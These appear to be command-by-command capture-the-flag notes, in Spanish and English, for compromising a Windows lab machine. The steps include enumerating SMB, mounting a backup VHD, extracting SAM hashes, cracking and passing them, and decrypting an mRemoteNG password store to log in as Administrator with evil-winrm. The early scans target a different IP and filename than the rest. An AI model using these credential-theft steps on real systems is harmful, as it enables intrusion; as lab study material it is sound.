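# Aggressive scan (-A) of all TCP ports plus the "vuln" script category.
# NOTE: --min-rate=10000 trades accuracy for speed; dropped packets can hide
# open ports, so cross-check against the slower scan below.
nmap -A -p- -oA secnotes-vuln 10.129.178.250 --min-rate=10000 --script=vuln --script-timeout=15 -v

# Default scripts, version and OS detection on all TCP ports.
# Each run gets its own -oA basename: reusing "secnotes" would overwrite the
# .nmap/.gnmap/.xml files written by the previous scan.
nmap -sC -sV -O -p- -oA secnotes-tcp 10.129.178.250

# UDP scan of all ports, saved under a separate basename.
nmap -sU -O -p- -oA secnotes-udp 10.129.178.250

# Web server checks against port 80.
nikto -h 10.129.178.250:80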

Pasted image 20211229141326.png

Pasted image 20211229141559.png

Pasted image 20211229141521.png

crackmapexec smb 10.129.1.39

Pasted image 20211229141816.png

smbclient //10.129.1.39/Backups -N

Pasted image 20211229141944.png

sudo mkdir /mnt/smb

mount -t cifs "//10.129.1.39/Backups" /mnt/smb

cd /mnt/smb

Pasted image 20211229142339.png

tree

Pasted image 20211229142424.png

sudo rmmod nbd

sudo modprobe nbd

ls /dev

Pasted image 20211229153039.png

sudo qemu-nbd -r -c /dev/nbd0 "/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"

Pasted image 20211229153642.png

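# Create the mount point before mounting; "mount /mnt/vhd" on its own has no
# device to attach and no directory to attach it to.
sudo mkdir -p /mnt/vhd

# The NBD device was attached read-only (qemu-nbd -r), so mount the partition
# read-only as well to leave the backup image untouched.
sudo mount -o ro /dev/nbd0p1 /mnt/vhd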

Pasted image 20211230105402.png

No encontramos user.txt

Pasted image 20211230105628.png

Nos dirigimos al directorio config (Windows\System32\config), donde Windows guarda los hives del registro, entre ellos SAM y SYSTEM.

Pasted image 20211230110136.png

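Tratamos de hacer una copia del SAM. Una copia de seguridad que incluye los hives del registro expone los hashes NT de las cuentas locales a cualquiera que pueda leer el recurso compartido.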

Pasted image 20211230111454.png

crackmapexec smb bastion.htb -u 'Administrator' -H '31d6c...'

Pasted image 20211230112101.png

crackmapexec smb bastion.htb -u 'L4mpje' -H '2611...'

Pasted image 20211230112214.png

crackmapexec winrm bastion.htb -u 'L4mpje' -H '2611...'

Pasted image 20211230112248.png

La contraseña obtenida al crackear el hash NT con john (comando siguiente) es bureaulampje.

john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=NT

Pasted image 20211230112828.png

ssh L4mpje@bastion.htb

Pasted image 20211230113524.png

whoami /priv

Pasted image 20211230113919.png

whoami /all

Pasted image 20211230114014.png

Vemos que mRemoteNG está instalado; su archivo confCons.xml guarda las credenciales de las conexiones guardadas.

cd C:\PROGRA~2

Pasted image 20211230114520.png

cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG

Pasted image 20211230114835.png

type C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml

Pasted image 20211230115006.png

git clone https://github.com/haseebT/mRemoteNG-Decrypt

python mremoteng_decrypt.py -s 'aEWNFVS...'

Conseguimos las credenciales: Administrator:thXLHM96BeKL0ER2

Pasted image 20211230115602.png

crackmapexec smb bastion.htb -u 'Administrator' -p 'thXLHM96BeKL0ER2'

Pasted image 20211230115717.png

evil-winrm -i bastion.htb -u 'Administrator' -p 'thXLHM96BeKL0ER2'

Pasted image 20211230115828.png

Pasted image 20211229172609.png
